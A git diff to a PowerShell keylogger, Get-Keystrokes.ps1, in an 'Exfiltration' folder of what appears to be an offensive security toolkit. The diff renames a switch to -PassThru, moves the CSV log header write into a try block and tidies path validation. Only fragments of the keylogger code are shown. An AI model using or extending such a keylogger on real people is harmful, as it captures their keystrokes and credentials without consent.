1 files changed, 12 insertions, 7 deletions

diff --git a/Exfiltration/Get-Keystrokes.ps1 b/Exfiltration/Get-Keystrokes.ps1
index cc6b7a9..9e8698c 100644
--- a/Exfiltration/Get-Keystrokes.ps1
+++ b/Exfiltration/Get-Keystrokes.ps1
@@ -19,6 +19,10 @@ function Get-Keystrokes {
 
     Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely.
 
+.PARAMETER PassThru
+
+    Returns the keylogger's PowerShell object, so that it may manipulated (disposed) by the user; primarily for testing purposes.
+
 .EXAMPLE
 
     Get-Keystrokes -LogPath C:\key.log
@@ -36,18 +40,21 @@ function Get-Keystrokes {
     [CmdletBinding()] 
     Param (
         [Parameter(Position = 0)]
-        [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent $_)) -PathType Container})]
-        [String]$LogPath = "$($Env:TEMP)\key.log",
+        [ValidateScript({(Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container)})]
+        [String]$LogPath = "$($env:TEMP)\key.log",
 
         [Parameter(Position = 1)]
         [Double]$Timeout,
 
         [Parameter()]
-        [Switch]$Return
+        [Switch]$PassThru
     )
 
     $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath)
 
+    try { '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode }
+    catch { throw $_ }
+
     $Script = {
         Param (
             [Parameter(Position = 0)]
@@ -157,8 +164,6 @@ function Get-Keystrokes {
     
         #endregion Imports
 
-        '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode
-
         $CallbackScript = {
             Param (
                 [Parameter()]
@@ -368,5 +373,5 @@ function Get-Keystrokes {
     # Start KeyLogger
     [void]$PowerShell.BeginInvoke()
 
-    if ($Return.IsPresent) { return $PowerShell }
-}
+    if ($PassThru.IsPresent) { return $PowerShell }
+}
\ No newline at end of file